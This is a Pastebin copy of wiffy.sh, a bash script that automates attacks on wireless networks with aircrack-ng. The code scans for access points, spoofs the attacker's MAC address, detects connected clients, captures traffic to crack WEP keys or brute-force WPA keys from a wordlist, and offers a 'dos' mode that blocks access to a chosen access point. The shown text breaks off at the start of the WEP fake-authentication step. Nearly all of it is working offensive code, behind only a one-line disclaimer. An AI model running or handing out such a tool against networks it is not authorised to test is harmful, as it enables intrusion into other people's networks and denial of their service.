API tools faq
paste
Advertisement
Guest User

wiffy.sh

a guest
Jul 20th, 2013
325
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.94 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #----------------------------------------------------------------------------------------------#
  3. #wiffy.sh v0.1 (#5 2010-09-13) #
  4. # (C)opyright 2010 - g0tmi1k #
  5. #---License------------------------------------------------------------------------------------#
  6. # This program is free software: you can redistribute it and/or modify it under the terms #
  7. # of the GNU General Public License as published by the Free Software Foundation, either #
  8. # version 3 of the License, or (at your option) any later version. #
  9. # #
  10. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
  11. # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #
  12. # See the GNU General Public License for more details. #
  13. # #
  14. # You should have received a copy of the GNU General Public License along with this program. #
  15. # If not, see <http://www.gnu.org/licenses/>. #
  16. #---Important----------------------------------------------------------------------------------#
  17. # *** Do NOT use this for illegal or malicious use *** #
  18. #---Defaults-----------------------------------------------------------------------------------#
  19. # The interfaces you use
  20. interface="wlan0"
  21.  
  22. # [crack/dos] Crack - cracks WiFi Keys, dos - blocks access to ap.
  23. mode="crack"
  24.  
  25. # [random/set/false] Change the MAC address
  26. macMode="set"
  27. fakeMac="00:05:7c:9a:58:3f"
  28.  
  29. # [/path/to/the/folder] The file used to brute force WPA keys.
  30. wordlist="/pentest/passwords/wordlists/wpa.txt"
  31.  
  32. # [true/false] Connect to network afterwords
  33. extras="false"
  34.  
  35. # [true/false] diagnostics = Creates a output file displays exactly whats going on. [0/1/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands
  36. diagnostics="false"
  37. verbose="0"
  38.  
  39. #---Variables----------------------------------------------------------------------------------#
  40. version="0.1 (#5)" # Version
  41. monitorInterface="mon0" # Default
  42. bssid="" # null the value
  43. essid="" # null the value
  44. channel="" # null the value
  45. client="" # null the value
  46. debug="false" # Windows don't close, shows extra stuff
  47. logFile="wiffy.log" # filename of output
  48. trap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)
  49.  
  50. #----Functions---------------------------------------------------------------------------------#
  51. function findAP () { #findAP
  52. action "Scanning network" "rm -f /tmp/wiffy.tmp && iwlist $interface scan > /tmp/wiffy.tmp" $verbose $diagnostics "true"
  53. #arrayESSID=( $(cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}') )
  54. arrayBSSID=( $(cat /tmp/wiffy.tmp | grep "Address:" | awk '{print $5}\') )
  55. arrayChannel=( $(cat /tmp/wiffy.tmp | grep "Channel:" | tr ':' ' ' | awk '{print $2}\') )
  56. arrayProtected=( $(cat /tmp/wiffy.tmp | grep "key:" | sed 's/.*key://g') )
  57. arrayQuality=( $(cat /tmp/wiffy.tmp | grep "Quality" | sed 's/.*Quality=//g' | awk -F " " '{print $1}' ) )
  58.  
  59. id=""
  60. index="0"
  61. for item in "${arrayBSSID[@]}"; do
  62. if [ "$bssid" ] && [ "$bssid" == "$item" ] ; then id="$index" ;fi
  63. command=$(cat /tmp/wiffy.tmp | sed -n "/$item/, +20p" | grep "WPA" )
  64. if [ "$command" ] ; then arrayEncryption[$index]="WPA"
  65. elif [ ${arrayProtected[$index]} == "off" ] ; then arrayEncryption[$index]="N/A"
  66. else arrayEncryption[$index]="WEP" ; fi
  67. index=$(($index+1))
  68. done
  69.  
  70. #-Cheap hack to support essids with spaces in-----------------------------------------------------------
  71. cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}' | sed 's/\"//' | sed 's/\(.*\)\"/\1/' > /tmp/wiffy.ssid
  72. index="0"
  73. while read line ; do
  74. if [ "$essid" ] && [ "$essid" == "$line" ] ; then id="$index" ; fi
  75. arrayESSID[$index]="$line"
  76. index=$(($index+1))
  77. done < "/tmp/wiffy.ssid"
  78. rm -f /tmp/wiffy.ssid
  79. #--------------------------------------------------------------------------------------------------------------
  80. }
  81. function findClient () { #findClient $encryption
  82. if [ -z "$1" ] ; then error="1" ; fi # Coding error
  83. if [ "$error" == "free" ] ; then
  84. client=""
  85. action "Removing temp files" "rm -f /tmp/wiffy.dump* && sleep 1" $verbose $diagnostics "true"
  86. action "airodump-ng (client(s))" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy.dump --output-format netxml $monitorInterface" $verbose $diagnostics "true" &
  87. sleep 3
  88.  
  89. if [ "$1" == "WEP" ] || [ "$1" == "N/A" ] ; then # N/A = For MAC filtering
  90. sleep 5
  91. client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
  92. elif [ "$1" == "WPA" ] ; then
  93. while [ -z "$client" ] ; do
  94. sleep 2
  95. client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
  96. done
  97. fi
  98.  
  99. if [ -z "$essid" ] ; then
  100. essid=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "<essid cloaked=\"false\">" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/')
  101. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*hidden* essid=$essid" $diagnostics ; fi
  102. fi
  103.  
  104. command=$(ps aux | grep "airodump-ng" | awk '!/grep/ && !/awk/ && !/cap/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
  105. if [ -n "$command" ] ; then
  106. action "Killing programs" "kill $command" $verbose $diagnostics "true"
  107. sleep 1
  108. fi
  109.  
  110. action "Removing temp files" "rm -f /tmp/wiffy.dump*" $verbose $diagnostics "true"
  111. if [ "$client" == "" ] ; then client="clientless" ; fi
  112. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "client=$client" $diagnostics ; fi
  113. return 0
  114. else
  115. display error "findClient. Error code: $error" $diagnostics 1>&2
  116. return 1
  117. fi
  118. }
  119. function update() { # update
  120. if [ -e "/usr/bin/svn" ] ; then
  121. display action "Checking for an update..." $diagnostics
  122. update=$(svn info http://g0tmi1k.googlecode.com/svn/trunk/wiffy/ | grep "Last Changed Rev:" |cut -c11-)
  123. if [ "$version" != "0.3 (#$update)" ] ; then
  124. display info "Updating..." $diagnostics
  125. svn export -q --force http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh wiffy.sh
  126. display info "Updated to $update. (=" $diagnostics
  127. else
  128. display info "You're using the latest version. (=" $diagnostics
  129. fi
  130. else
  131. display info "Updating..." $diagnostics
  132. wget -nv -N http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh
  133. display info "Updated! (=" $diagnostics
  134. fi
  135. echo
  136. exit 2
  137. }
  138. function cleanup() { # cleanup mode
  139. if [ "$1" == "nonuser" ] ; then exit 3 ; fi
  140.  
  141. action "Killing xterm" "killall xterm" $verbose $diagnostics "true"
  142. if [ "$1" != "clean" ] ; then
  143. echo # Blank line
  144. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*** BREAK ***" $diagnostics ; fi # User quit
  145. fi
  146. display action "Restoring: Environment" $diagnostics
  147.  
  148. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  149. if [ "$command" == "$monitorInterface" ] ; then
  150. sleep 3 # Sometimes it needs to catch up/wait
  151. action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  152. fi
  153.  
  154. if [ "$debug" != "true" ] ; then
  155. command=""
  156. tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
  157. if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
  158. tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
  159. if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
  160. tmp=$(ls replay_arp*.cap 2> /dev/null)
  161. if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
  162. if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
  163. if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
  164. if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
  165. if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
  166. if [ ! -z "$command" ] ; then action "Removing temp files" "rm -rfv $command" $verbose $diagnostics "true" ; fi
  167. fi
  168.  
  169. echo -e "\e[01;36m[*]\e[00m Done! (= Have you... g0tmi1k?"
  170. exit 0
  171. }
  172. function help() {
  173. echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com
  174.  
  175. Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack/dos] -e [essid] -b [bssid]
  176. -c [mac] -w [/path/to/file] (-z / -s [mac]) -x -d (-v / -V) ([-u] [-?])
  177.  
  178. Options:
  179. -i --- Internet Interface e.g. $interface
  180. -t --- Monitor Interface e.g. $monitorInterface
  181.  
  182. -m --- Mode. e.g. $mode
  183.  
  184. -e --- ESSID (WiFi Name)
  185. -b --- BSSID (AP MAC Address)
  186. -c --- Client that is connect to the acess point
  187.  
  188. -w --- Path to Wordlist e.g. $wordlist
  189.  
  190. -z --- Change interface's MAC Address e.g. $macMode
  191. -s --- Use this MAC Address e.g. $fakeMac
  192.  
  193. -x --- Connect to network afterwords
  194.  
  195. -d --- Diagnostics (Creates output file, $logFile)
  196. -v --- Verbose (Displays more)
  197. -V --- (Higher) Verbose (Displays more + shows commands)
  198.  
  199. -u --- Update
  200. -? --- This
  201.  
  202.  
  203.  
  204. Known issues:
  205. -WEP
  206. > Didn't detect my client
  207. + Add it in manually
  208. + Re-run the script
  209. > IV's doesn't increae
  210. + DeAuth didn't work --- Client using Windows 7?
  211. + Use a different router/client
  212.  
  213. -WPA
  214. > You can ONLY crack WPA when:
  215. + The ESSID is known
  216. + The WiFi key is in the word-list
  217. + There is a connected client
  218.  
  219. -Doesn't detect any/my wireless network
  220. > Don't run from a virtual machine
  221. > Driver issue - Use a different WiFi device
  222. > Try the 're[f]resh' option
  223. > Unplug WiFi device, wait, replug
  224. > You're too close/far away
  225.  
  226. -\"Extras\" doesn't work
  227. > Network doesn't have a DHCP server
  228.  
  229. -Slow
  230. > Try a different attack... manually!
  231. "
  232. exit 1
  233. }
  234. function action() { # action title command $verbose $diagnostics screen&file x|y|lines hold
  235. error="free"
  236. if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  237. if [ "$error" == "free" ] ; then
  238. xterm="xterm" #Defaults
  239. command=$2
  240. x="100"
  241. y="0"
  242. lines="15"
  243. if [ "$7" == "hold" ] ; then xterm="$xterm -hold" ; fi
  244. if [ "$3" == "2" ] ; then echo "Command: $command" ; fi
  245. if [ "$4" == "true" ] ; then echo "$1~$command" >> $logFile ; fi
  246. if [ "$4" == "true" ] && [ "$5" == "true" ] ; then command="$command | tee -a $logFile" ; fi
  247. if [ ! -z "$6" ] ; then
  248. x=$(echo $6 | cut -d'|' -f1)
  249. y=$(echo $6 | cut -d'|' -f2)
  250. lines=$(echo $6 | cut -d'|' -f3)
  251. fi
  252. $xterm -geometry 100x$lines+$x+$y -T "wiffy v$version - $1" -e "$command"
  253. return 0
  254. else
  255. display error "action. Error code: $error" $diagnostics 1>&2
  256. echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7" >> $logFile ;
  257. return 1
  258. fi
  259. }
  260. function display() { # display type message $diagnostics
  261. error="free"
  262. if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  263. if [ "$1" != "action" ] && [ "$1" != "info" ] && [ "$1" != "diag" ] && [ "$1" != "error" ] ; then error="5"; fi # Coding error
  264. if [ "$error" == "free" ] ; then
  265. output=""
  266. if [ "$1" == "action" ] ; then output="\e[01;32m[>]\e[00m" ; fi
  267. if [ "$1" == "info" ] ; then output="\e[01;33m[i]\e[00m" ; fi
  268. if [ "$1" == "diag" ] ; then output="\e[01;34m[+]\e[00m" ; fi
  269. if [ "$1" == "error" ] ; then output="\e[01;31m[-]\e[00m" ; fi
  270. output="$output $2"
  271. echo -e "$output"
  272. if [ "$3" == "true" ] ; then
  273. if [ "$1" == "action" ] ; then output="[>]" ; fi
  274. if [ "$1" == "info" ] ; then output="[i]" ; fi
  275. if [ "$1" == "diag" ] ; then output="[+]" ; fi
  276. if [ "$1" == "error" ] ; then output="[-]" ; fi
  277. echo -e "---------------------------------------------------------------------------------------------\n$output $2" >> $logFile
  278. fi
  279. return 0
  280. else
  281. display error "display. Error code: $error" $logFile 1>&2
  282. echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: display (Error code: $error): $1 , $2 , $3 " >> $logFile ;
  283. return 1
  284. fi
  285. }
  286.  
  287.  
  288. #----------------------------------------------------------------------------------------------#
  289. echo -e "\e[01;36m[*]\e[00m wiffy v$version"
  290.  
  291. #----------------------------------------------------------------------------------------------#
  292. while getopts "i:t:m:e:b:c:w:z:s:xdvVu?" OPTIONS; do
  293. case ${OPTIONS} in
  294. i ) interface=$OPTARG;;
  295. t ) monitorInterface=$OPTARG;;
  296. m ) mode=$OPTARG;;
  297. e ) essid=$OPTARG;;
  298. b ) bssid=$OPTARG;;
  299. c ) client=$OPTARG;;
  300. w ) wordlist=$OPTARG;;
  301. z ) macMode=$OPTARG;;
  302. s ) fakeMac=$OPTARG;;
  303. x ) extras="true";;
  304. d ) diagnostics="true";;
  305. v ) verbose="1";;
  306. V ) verbose="2";;
  307. u ) update;;
  308. ? ) help;;
  309. * ) display error "Unknown option." $diagnostics 1>&2 ;; # Default
  310. esac
  311. done
  312.  
  313. #----------------------------------------------------------------------------------------------#
  314. if [ "$debug" == "true" ] ; then
  315. display info "Debug mode" $diagnostics
  316. fi
  317. if [ "$diagnostics" == "true" ] ; then
  318. display diag "Diagnostics mode" $diagnostics
  319. echo -e "wiffy v$version\n$(date)" > $logFile
  320. echo "wiffy.sh" $* >> $logFile
  321. fi
  322.  
  323. #----------------------------------------------------------------------------------------------#
  324. display action "Analyzing: Environment" $diagnostics
  325.  
  326. #----------------------------------------------------------------------------------------------#
  327. if [ "$(id -u)" != "0" ] ; then display error "Not a superuser." $diagnostics 1>&2 ; cleanup nonuser; fi
  328.  
  329. #----------------------------------------------------------------------------------------------#
  330. command=""
  331. tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
  332. if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
  333. tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
  334. if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
  335. tmp=$(ls replay_arp*.cap 2> /dev/null)
  336. if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
  337. if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
  338. if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
  339. if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
  340. if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
  341. if [ ! -z "$command" ] ; then action "Removing old files" "rm -rfv $command" $verbose $diagnostics "true" ; fi
  342.  
  343. #----------------------------------------------------------------------------------------------#
  344. if [ -z "$interface" ] ; then display error "interface can't be blank" $diagnostics 1>&2 ; cleanup; fi
  345. if [ -z "$monitorInterface" ] ; then display error "monitorInterface can't be blank" $diagnostics 1>&2 ; cleanup; fi
  346. if [ "$mode" != "crack" ] && [ "$mode" != "dos" ] ; then display error "mode ($mode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  347. if [ ! -e "$wordlist" ] ; then display error "There isn't a wordlist at $wordlist" $diagnostics 1>&2 ; cleanup; fi
  348. if [ "$macMode" != "random" ] && [ "$macMode" != "set" ] && [ "$macMode" != "false" ] ; then display error "macMode ($macMode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  349. if [ "$macMode" == "set" ] ; then if [ -z "$fakeMac" ] || [ ! $(echo $fakeMac | egrep "^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$") ] ; then display error "fakeMac ($fakeMac) isn't correct" $diagnostics 1>&2 ; cleanup; fi ; fi
  350. if [ "$mode" == "crack" ] && [ "$extras" != "true" ] && [ "$extras" != "false" ] ; then display error "extras ($extras) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  351. if [ "$diagnostics" != "true" ] && [ "$diagnostics" != "false" ] ; then display error "diagnostics ($diagnostics) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  352. if [ "$verbose" != "0" ] && [ "$verbose" != "1" ] && [ "$verbose" != "2" ] ; then display error "verbose ($verbose) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  353. if [ -z "$version" ] ; then display error "version ($version) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  354. if [ "$debug" != "true" ] && [ "$debug" != "false" ] ; then display error "debug ($debug) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  355. if [ "$diagnostics" == "true" ] && [ -z "$logFile" ] ; then display error "logFile ($logFile) isn't correct" $diagnostics 1>&2 ; cleanup ; fi
  356.  
  357. #----------------------------------------------------------------------------------------------#
  358. command=$(iwconfig $interface 2>/dev/null | grep "802.11" | cut -d" " -f1)
  359. if [ ! $command ]; then
  360. display error "$interface isn't a wireless interface." $diagnostics
  361. display info "Searching for a wireless interface" $diagnostics
  362. command=$(iwconfig 2>/dev/null | grep "802.11" | cut -d" " -f1) #| awk '!/"'"$interface"'"/'
  363. if [ $command ] ; then
  364. interface=$command
  365. display info "Found $interface" $diagnostics
  366. else
  367. display error "Couldn't find a wireless interface." $diagnostics 1>&2
  368. cleanup
  369. fi
  370. fi
  371.  
  372. command=$(ifconfig -a | grep $interface | awk '{print $1}')
  373. if [ "$command" != "$interface" ] ; then
  374. display error "The wireless interface $interface, isn't correct." $diagnostics 1>&2
  375. if [ "$debug" == "true" ] ; then iwconfig; fi
  376. cleanup
  377. fi
  378.  
  379. #----------------------------------------------------------------------------------------------#
  380. mac=$(macchanger --show $interface | awk -F " " '{print $3}')
  381.  
  382. #----------------------------------------------------------------------------------------------#
  383. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Stopping: Programs" $diagnostics ; fi
  384. command=$(ps aux | grep $interface | awk '!/grep/ && !/awk/ && !/wiffy/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
  385. if [ -n "$command" ] ; then
  386. action "Killing programs" "kill $command" $verbose $diagnostics "true" # to prevent interference
  387. fi
  388. action "Killing 'Programs'" "killall wicd-client airodump-ng xterm" $verbose $diagnostics "true" # Killing "wicd-client" to prevent channel hopping
  389. action "Killing 'wicd service'" "/etc/init.d/wicd stop" $verbose $diagnostics "true" # Stopping wicd to prevent channel hopping
  390.  
  391. #----------------------------------------------------------------------------------------------#
  392. action "Refreshing interface" "ifconfig $interface down && ifconfig $interface up && sleep 1" $verbose $diagnostics "true"
  393. loopMain="false"
  394. while [ "$loopMain" != "true" ] ; do
  395. findAP
  396. if [ "$id" ] ; then
  397. loopMain="true"
  398. else
  399. if [ "$essid" ] ; then display error "Couldnt find essid ($essid)" $diagnostics 1>&2 ; fi
  400. if [ "$bssid" ] ; then display error "Couldnt find bssid ($bssid)" $diagnostics 1>&2 ; fi
  401. loop=${#arrayBSSID[@]}
  402. echo -e " Num | ESSID | BSSID | Protected | Cha | Quality\n-----|------------------------|-------------------|-----------|-----|---------"
  403. for (( i=0;i<$loop;i++)); do
  404. printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\n' "$(($i+1))" "${arrayESSID[${i}]}" "${arrayBSSID[${i}]}" "${arrayProtected[${i}]}" "${arrayEncryption[${i}]}" "${arrayChannel[${i}]}" "${arrayQuality[${i}]}"
  405. done
  406. loopSub="false"
  407. while [ "$loopSub" != "true" ] ; do
  408. read -p "[~] re[s]can, re[f]resh, e[x]it or select num: "
  409. if [ "$REPLY" == "x" ] ; then cleanup clean
  410. elif [ "$REPLY" == "s" ] ; then loopSub="true" # aka do nothing
  411. elif [ "$REPLY" == "f" ] ; then action "Refreshing interface" "ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1" $verbose $diagnostics "true" && loopSub="true" # aka do nothing
  412. elif [ -z $(echo "$REPLY" | tr -dc '[:digit:]'l) ] ; then display error "Bad input, $REPLY" $diagnostics 1>&2
  413. elif [ "$REPLY" -lt 1 ] || [ "$REPLY" -gt $loop ] ; then display error "Incorrect number, $REPLY" $diagnostics 1>&2
  414. else id="$(($REPLY-1))" ; loopSub="true" ; loopMain="true"
  415. fi
  416. done
  417. fi
  418. done
  419. essid="${arrayESSID[$id]}"
  420. bssid="${arrayBSSID[$id]}"
  421. channel="${arrayChannel[$id]}"
  422. encryption="${arrayEncryption[$id]}"
  423.  
  424. #----------------------------------------------------------------------------------------------#
  425. if [ "$diagnostics" == "true" ] ; then
  426. echo "-Settings------------------------------------------------------------------------------------
  427. interface=$interface
  428. monitorInterface=$monitorInterface
  429. mode=$mode
  430. essid=$essid
  431. bssid=$bssid
  432. encryption=$encryption
  433. channel=$channel
  434. client=$client
  435. wordlist=$wordlist
  436. mac=$mac
  437. macMode=$macMode
  438. fakeMac=$fakeMac
  439. diagnostics=$diagnostics
  440. verbose=$verbose
  441. debug=$debug
  442. -Environment---------------------------------------------------------------------------------" >> $logFile
  443. display diag "Detecting: Kernal" $diagnostics
  444. uname -a >> $logFile
  445. display diag "Detecting: Hardware" $diagnostics
  446. lspci -knn >> $logFile
  447. fi
  448. if [ "$debug" == "true" ] || [ "$verbose" != "0" ] ; then
  449. display info " interface=$interface
  450. \e[01;33m[i]\e[00m monitorInterface=$monitorInterface
  451. \e[01;33m[i]\e[00m mode=$mode
  452. \e[01;33m[i]\e[00m essid=$essid
  453. \e[01;33m[i]\e[00m bssid=$bssid
  454. \e[01;33m[i]\e[00m encryption=$encryption
  455. \e[01;33m[i]\e[00m channel=$channel
  456. \e[01;33m[i]\e[00m client=$client
  457. \e[01;33m[i]\e[00m wordlist=$wordlist
  458. \e[01;33m[i]\e[00m mac=$mac
  459. \e[01;33m[i]\e[00m macMode=$macMode
  460. \e[01;33m[i]\e[00m fakeMac=$fakeMac
  461. \e[01;33m[i]\e[00m diagnostics=$diagnostics
  462. \e[01;33m[i]\e[00m verbose=$verbose
  463. \e[01;33m[i]\e[00m debug=$debug"
  464. fi
  465.  
  466. #----------------------------------------------------------------------------------------------#
  467. if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  468. display error "aircrack-ng isn't installed." $diagnostics 1>&2
  469. read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  470. if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install aircrack-ng" "apt-get -y install aircrack-ng" $verbose $diagnostics "true" ; fi
  471. if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  472. display error "Failed to install aircrack-ng" $diagnostics 1>&2 ; cleanup
  473. else
  474. display info "Installed aircrack-ng" $diagnostics
  475. fi
  476. fi
  477. if [ ! -e "/usr/bin/macchanger" ] ; then
  478. display error "macchanger isn't installed." $diagnostics
  479. read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  480. if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install macchanger" "apt-get -y install macchanger" $verbose $diagnostics "true" ; fi
  481. if [ ! -e "/usr/bin/macchanger" ] ; then
  482. display error "Failed to install macchanger" $diagnostics 1>&2 ; cleanup
  483. else
  484. display info "Installed macchanger" $diagnostics
  485. fi
  486. fi
  487. #if [ "$attack" == "inject" ] ; then
  488. # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
  489. # display error "airpwn isn't installed." $diagnostics
  490. # read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  491. # if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install airpwn" "apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev" $verbose $diagnostics "true" ; fi
  492. # action "Install airpwn" "wget -P /tmp http://downloads.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz && tar -C /pentest/wireless -xvf /tmp/airpwn-1.4.tgz && rm /tmp/airpwn-1.4.tgz" $verbose $diagnostics "true"
  493. # find="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H"
  494. # replace="#ifndef _LINUX_WIRELESS_H"
  495. # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h" > "/usr/include/linux/wireless.h.new"
  496. # find="#ifndef _LINUX_WIRELESS_H"
  497. # replace="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H"
  498. # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h.new" > "/usr/include/linux/wireless.h"
  499. # rm -f "/usr/include/linux/wireless.h.new"
  500. # action "Install airpwn" "command=$(pwd) && tar -C /pentest/wireless/airpwn-1.4 -xvf /pentest/wireless/airpwn-1.4/lorcon-current.tgz && cd /pentest/wireless/airpwn-1.4/lorcon && ./configure && make && make install && cd $command" $verbose $diagnostics "true"
  501. # action "Install airpwn" "command=$(pwd) && cd /pentest/wireless/airpwn-1.4 && ./configure && make && cd $command" $verbose $diagnostics "true"
  502. # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
  503. # display error "Failed to install airpwn" $diagnostics 1>&2 ; cleanup
  504. # else
  505. # display info "Installed airpwn" $diagnostics
  506. # fi
  507. # fi
  508. #fi
  509.  
  510. #----------------------------------------------------------------------------------------------#
  511. display action "Configuring: Environment" $diagnostics
  512.  
  513. #----------------------------------------------------------------------------------------------#
  514. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: Wireless card" $diagnostics ; fi
  515. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  516. if [ "$command" == "$monitorInterface" ] ; then
  517. action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  518. sleep 1
  519. fi
  520.  
  521. action "Monitor Mode (Starting)" "airmon-ng start $interface | awk '/monitor mode enabled on/ {print \$5}' | tr -d '\011' | sed -e \"s/(monitor mode enabled on //\" | sed 's/\(.*\)./\1/' > /tmp/wiffy.tmp" $verbose $diagnostics "true"
  522. command=$(cat /tmp/wiffy.tmp)
  523. if [ "$monitorInterface" != "$command" ] ; then
  524. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  525. display info "Configuring: Chaning monitorInterface to: $command" $diagnostics
  526. fi
  527. monitorInterface=$command
  528. fi
  529.  
  530. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  531. if [ "$command" != "$monitorInterface" ] ; then
  532. sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!
  533. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  534. if [ "$command" != "$monitorInterface" ] ; then
  535. display error "The monitor interface $monitorInterface, isn't correct." $diagnostics 1>&2
  536. if [ "$debug" == "true" ] ; then iwconfig; fi
  537. cleanup
  538. fi
  539. fi
  540.  
  541. #----------------------------------------------------------------------------------------------#
  542. if [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  543. display diag "Testing: Wireless Injection" $diagnostics
  544. command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)
  545. if [ "$diagnostics" == "true" ] ; then echo -e $command >> $logFile ; fi
  546. if [ -z "$(echo \"$command\" | grep 'Injection is working')" ] ; then display error "$monitorInterface doesn't support packet injecting." $diagnostics 1>&2
  547. elif [ -z "$(echo \"$command\" | grep 'Found 0 APs')" ] ; then display error "Couldn't test packet injection" $diagnostics 1>&2 ;
  548. fi
  549. fi
  550.  
  551. #----------------------------------------------------------------------------------------------#
  552. if [ "$macMode" != "false" ] ; then
  553. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: MAC address" $diagnostics ; fi
  554. command="ifconfig $monitorInterface down &&"
  555. if [ "$macMode" == "random" ] ; then command="$command macchanger -A $monitorInterface &&"; fi
  556. if [ "$macMode" == "set" ] ; then command="$command macchanger -m $fakeMac $monitorInterface &&"; fi
  557. command="$command ifconfig $monitorInterface up"
  558. action "Configuring: MAC address" "$command" $verbose $diagnostics "true"
  559. sleep 2
  560. mac="$fakeMac"
  561. fi
  562.  
  563. #----------------------------------------------------------------------------------------------#
  564. if [ "$mode" == "crack" ] ; then
  565. if [ -z "$client" ] ; then
  566. display action "Detecting: Client(s)" $diagnostics
  567. findClient $encryption
  568. fi
  569.  
  570. #----------------------------------------------------------------------------------------------#
  571. display action "Starting: airodump-ng" $diagnostics
  572. action "Removing temp files" "rm -f /tmp/wiffy* && sleep 1" $verbose $diagnostics "true"
  573. action "airodump-ng" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy --output-format cap $monitorInterface" $verbose $diagnostics "true" "0|0|13" & # Don't wait, do the next command
  574. sleep 1
  575.  
  576. #----------------------------------------------------------------------------------------------#
  577. if [ "$encryption" == "WEP" ] ; then
  578. if [ "$client" == "clientless" ] ; then
  579. display action "Attack (FakeAuth): $fakeMac" $diagnostics
